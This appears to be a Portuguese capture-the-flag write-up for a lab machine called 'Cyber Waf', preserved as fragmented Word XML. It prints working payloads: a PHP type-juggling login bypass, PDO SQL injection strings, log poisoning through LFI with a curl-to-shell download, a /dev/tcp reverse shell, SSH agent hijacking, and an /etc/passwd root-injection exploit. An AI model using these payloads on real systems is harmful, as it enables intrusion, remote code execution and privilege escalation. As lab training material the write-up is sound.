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pvaib8tv9s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u2cbqfnrnvd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Cyber Waf.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7lcsks5s5slz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da máquina foi realizada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identificar as portas abertas e os serviços expostos pela aplicação.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-Pn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7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varredura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que o endereço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redireciona para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http://cyberwaf.hc/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garantir a resolução correta do nome, o domínio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resolução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local.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nano /etc/hosts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configuração, foi possível acessar a aplicação web por meio do endereço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http://cyberwaf.hc/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7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Adicionalmente, foi realizado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subdomínios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associados à aplicação.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 à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aplicação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//cyberwaf.hc/ -H "Host: FUZZ.cyberwaf.hc" -w n0kovo_subdomains.txt -c -t 100 -fw 20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7113"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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1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subdomínio recém-identificado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local, permitindo a resolução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adequada.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o acesso ao subdomínio administrativo da aplicação (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admin.cyberwaf.hc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6307"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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3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execução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aplicação, foi identificado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exposto, caracterizando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Exposed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diretório continha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repositório completo da aplicação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acesso ao código-fonte.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//admin.cyberwaf.hc/FUZZ -w quickhits.txt -c -t 100 -fw 20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05871"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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87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explorar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Exposed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utilizada a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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permitiu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extração completa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repositório para um diretório local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python3 git_dumper.py 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//admin.cyberwaf.hc/.git app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8000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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8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os arquivos extraídos do repositório, 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examinar o histórico de commits e identificar um usuário válido associado ao projeto: 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aurora@cyberwaf.hc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log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97100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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dos arquivos da aplicação, foi identificado o arquivo de definição de rotas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app/routes/routes.php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8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responsável pela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home.php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localizado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Nele, foi identificada,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linha 30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uma rotina de autenticação que realiza a validação de credenciais de usuário por meio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verificação de senha. Foi identificada a utilização de comparação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do operador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pode introduzir riscos relacionados a comparações fracas ou inconsistentes, dependendo da implementação.</w:t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46613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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correspondente à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uma função responsável por realizar consultas ao banco de dados por meio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localizado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models/modelsFunctions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análise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demonstra que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parâmetro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utilizado para definir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coluna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consulta é controlável pelo usuário, caracterizando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0744"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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4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7488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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correspondente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controle de acesso baseado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exigindo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autorização. Além disso, a funcionalidade utiliza um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controlado pelo usuário para montar dinamicamente o caminho de um arquivo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incluí-lo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Mesmo com a restrição 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extensão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esse comportamento caracteriza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leitura de arquivos de log da aplicação e podendo resultar em impacto adicional caso arquivos manipuláveis sejam incluídos.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2155"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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1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contém a referência ao nome do banco de dados utilizado pela aplicação, identificado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demo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9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aplicação realiza a validação de senha por meio de comparação fraca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(==)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entre hashes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cenário clássico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Type Juggling em PHP.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valores que iniciam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seguidos apenas de números são interpretados como notação científica, resultando no valor numérico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quando ocorre conversão implícita de tipo. Dessa forma, duas strings diferentes como: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0e830400451993494058024219903391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0e462097431906509019562988736854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são avaliadas como iguais quando comparadas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==,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pois ambas são tratadas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QNKCDZO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ser processada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gera um hash iniciado por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que permite contornar a autenticação caso a aplicação utilize comparação não estrita.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Mesmo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8,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 comportamento ainda ocorre quando a aplicação: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MD5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armazenamento de senhas;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 comparação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==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vez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===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Não aplica funções seguras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hash_equals().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do mecanismo de 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obter acesso à aplicação utilizando credenciais inválidas.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aurora@cyberwaf.hc:QNKCDZO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9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acessada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na qual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manipular parâmetros da consulta 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controle da tabela utilizada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query.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9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Mesmo utilizando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manipular a entrada do usuário para confundir o parser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PDO,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fazendo com que parte do conteúdo seja interpretado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vez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texto literal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casos específicos, a injeção de um placeholder acompanhada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byte nulo (\0)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pode causar uma interpretação incorreta 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query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que payloads maliciosos sejam incorporados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instrução final.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 comportamento possibilita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mesmo com o uso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prepared statements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principalmente quando há construção dinâmica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trechos não parametrizáveis, como nomes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colunas ou tabelas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concatenados a partir de entrada do usuário.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enumerar todas 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tabelas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presentes em todos os bancos de dados.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hyperlink r:id="rId3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https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/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.tables)y;%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table_name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information_schema.tables)y;#&amp;verify=\?#�`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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exploração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iniciar a enumeração das tabelas existentes no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demo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demo #nome da banco de dados em hexadecimal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.tables%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20WHERE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tables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table_name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information_schema.tables WHERE table_schema=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)y;#&amp;verify=\?#� # tables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46500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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duas tabelas no banco de dados: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waf_products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seguir, foi realizada a extração das colunas da tabela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 de dados sensíveis e estrutura. Na tabela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foram identificadas as colunas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20column_name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.columns%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20WHERE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column_name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information_schema.columns WHERE table_schema=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table_name=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)y;#&amp;verify=\?#�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users # nome da tabela em hexadecimal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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9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exploração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uso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extrair informações adicionais da tabela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yanna@cyberwaf.hc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hash da sua senha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089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20CONCAT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,email,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,password,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,admin)`%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20users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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B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CONCAT(id,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,email,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,password,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,admin)`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users)y;#&amp;verify=\?#�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yanna@cyberwaf.hc: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1861d297772b6e5e36339b54ebd5a65d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E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95700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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o hash foi quebrado utilizando o site </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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hyperlink r:id="rId3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resultando na recuperação da senha em texto claro.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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yanna@cyberwaf.hc:sheena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6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em texto claro, foi possível autenticar-se na aplicação com um usuário privilegiado.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7200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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autenticação como usuário privilegiado, foi possível acessar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onde, a partir da análise do código-fonte, foi identificada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0100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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código-fonte, a funcionalidade restringe a inclusão a arquivos com extensão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limitando a exploração a logs da aplicação. Entretanto, ainda é possível tentar acessar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relevantes do sistema, como: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/var/log/apache2/access.log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/var/log/auth.log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Apesar da restrição de extensão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não foi possível ler logs do sistema,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/var/log/apache2/access.log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 logs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devido ao escopo limitado do diretório de logs acessível pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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a aplicação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ModSecurity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OWASP CRS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os logs estiverem acessíveis para leitura, existe a possibilidade de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(injeção de conteúdo malicioso nos logs). Essa técnica pode ser explorada quando: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escrever entradas controladas pelo atacante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nos logs (por exemplo, via requisições HTTP manipuladas);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é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ler ou incluir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esses logs através de uma vulnerabilidade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LFI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cenário, o atacante pode inserir payloads nos logs e, em seguida,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incluir o arquivo de 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LFI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código ou obter informações sensíveis, dependendo do contexto e do mecanismo de interpretação do conteúdo.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página principal e tentar enviar conteúdo malicioso (por exemplo, SQL Injection ou payloads em rotas), a requisição foi bloqueada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ModSecurity com OWASP CRS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ativo e filtrando tentativas de exploração.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9600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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bloqueando as tentativas de exploração, os eventos são registrados no arquivo de auditoria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ModSecurity.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modsec_audit.log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esteja acessível para leitura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LFI,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possível realizar um ataque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injetando payloads maliciosos nos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em seguida, incluindo o arquivo para obter a execução de códigos remotos.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../../../../../var/log/apache2/modsec_audit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08200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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de leitura aos logs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realizamos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injetando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malicioso nos registros. O payload continha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executando um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enviou uma requisição ao nosso servidor, validando assim a execução remota de comandos no sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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"&lt;?php system('curl &lt;MACHINE-IP&gt;/'); ?&gt;" "http://cyberwaf.hc/?id=1'+OR+'1'='1"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"PHPSESSID=&lt;YOUR-TOKEN&gt;" 'http://admin.cyberwaf.hc/admin?log=../../../../../var/log/apache2/modsec_audit'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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7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originada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injetado foi recebida com sucesso em nosso servidor na porta 80.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python3 -m http.server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58900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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também é possível obter uma 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curl para baixar nosso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sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1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shell.sh              </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3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C4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/dev/tcp/&lt;VPN-IP&gt;/443 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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"&lt;?php system('curl&lt;VPN-IP&gt;/shell.sh | sh'); ?&gt;" "http://cyberwaf.hc/?id=1'+OR+'1'='1"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"PHPSESSID=&lt;YOUR-TOKEN&gt;" 'http://admin.cyberwaf.hc/admin?log=../../../../../var/log/apache2/modsec_audit'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43100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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requisição ao nosso servidor solicitando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shell.sh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em seguida recebemos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conexão reversa na porta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estabelecendo acesso ao sistema da aplicação.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7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Obtivemos acesso ao sistema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n6jkugougl4m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Obtivemos uma shell TTY interativa com o usuário www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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crt+z</w:t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D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Analisando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/etc/passwd,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dois usuários padrão do sistema,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e ubuntu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além de um usuário adicional chamado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aurora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/etc/passwd | grep bash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encontramos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ssh-Ky3bL9xQp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contendo dois arquivos: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agent.4721 e aurora.sock.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25400" l="25400" r="25400" t="2540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que o arquivo corresponde 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socket do tipo agent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agent.4721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/tmp/ssh-Ky3bL9xQp/agent.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4721</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9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identificado foi exportado para análise. Ao testar o socket, o output confirmou que se trata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socket do agente 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uma chave carregada, conforme evidenciado pela listagem de identidades associadas ao agente.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SSH_AUTH_SOCK=/tmp/ssh-Ky3bL9xQp/agent.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4721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ssh-add -l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socket do agente SSH exposto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estabelecer conexão com a máquina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aurora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 -o StrictHostKeyChecking=no aurora@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67100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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usuários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/home/aurora.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cqbjkf66zu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enumerar os privilégios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aurora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verificar se possui permissão para executar comandos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senha.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-l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aurora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permissão para executar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/usr/bin/below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sem necessidade de senha.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este binário existe um exploit conhecido que permite a escalação de </w:t>
      </w:r>
      <w:hyperlink r:id="rId5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privilégios vertical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exploração corresponde a um Proof of Concept (PoC)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CVE-2025-27591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uma vulnerabilidade que permite que usuários locais não privilegiados realizem escalonamento de privilégios para root por meio de ataques de symlink (link simbólico).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:spacing w:after="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 -f /var/log/below/error_root.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E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 -s /etc/passwd /var/log/below/error_root.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F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 /etc/passwd /tmp/payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110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'pwned::0:0::/root:/bin/bash'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 /tmp/payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111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timeout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/usr/bin/below record &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112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13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/tmp/payload &gt; /var/log/below/error_root.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114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 - pwned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:spacing w:after="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Obtivemos acesso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sistema, concluindo a escalação de privilégios.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43100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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da máquina.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4500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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headerReference r:id="rId60" w:type="default"/>
      <w:headerReference r:id="rId61" w:type="first"/>
      <w:headerReference r:id="rId62" w:type="even"/>
      <w:footerReference r:id="rId63" w:type="default"/>
      <w:footerReference r:id="rId64" w:type="first"/>
      <w:footerReference r:id="rId6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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1ls2ua3fzch8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4" name="image34.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3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4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Cyber Waf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18.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png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yberwaf.hc/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:aurora@cyberwaf.hc" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyberwaf.hc/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyberwaf.hc/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/incommatose/CVE-2025-27591-PoC" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cyberwaf.hc/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://admin.cyberwaf.hc" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External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jp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tqn8hshgzqQmVxbtWCnEV2wKw==">CgMxLjAyDmguZHB2YWliOHR2OXN5Mg5oLjd1MmNicWZucm52ZDIOaC43bGNza3M1czVzbHoyDmgubjZqa3Vnb3VnbDRtMg1oLndjcWJqa2Y2Nnp1Mg5oLjFsczJ1YTNmemNoODgAciExUEhMcmZkVXk0NXdpZzE1QThhLWNzZ2k5V3RwZnZBOUM=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